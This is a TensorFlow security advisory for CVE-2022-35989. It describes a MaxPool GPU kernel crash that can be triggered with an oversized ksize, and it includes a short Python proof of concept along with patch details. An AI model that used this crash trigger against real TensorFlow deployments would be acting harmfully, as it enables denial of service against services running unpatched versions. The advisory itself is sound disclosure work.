## TFSA-2022-120: `CHECK` fail in `MaxPool`

### CVE Number
CVE-2022-35989

### Impact
When `MaxPool` receives a window size input array `ksize` with dimensions greater than its input tensor `input`, the GPU kernel gives a `CHECK` fail that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
import numpy as np

input = np.ones([1, 1, 1, 1])
ksize = [1, 1, 2, 2]
strides = [1, 1, 1, 1]
padding = 'VALID'
data_format = 'NCHW'

tf.raw_ops.MaxPool(input=input, ksize=ksize, strides=strides, padding=padding, data_format=data_format)
```

### Patches
We have patched the issue in GitHub commit [32d7bd3defd134f21a4e344c8dfd40099aaf6b18](https://github.com/tensorflow/tensorflow/commit/32d7bd3defd134f21a4e344c8dfd40099aaf6b18).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Jingyi Shi.
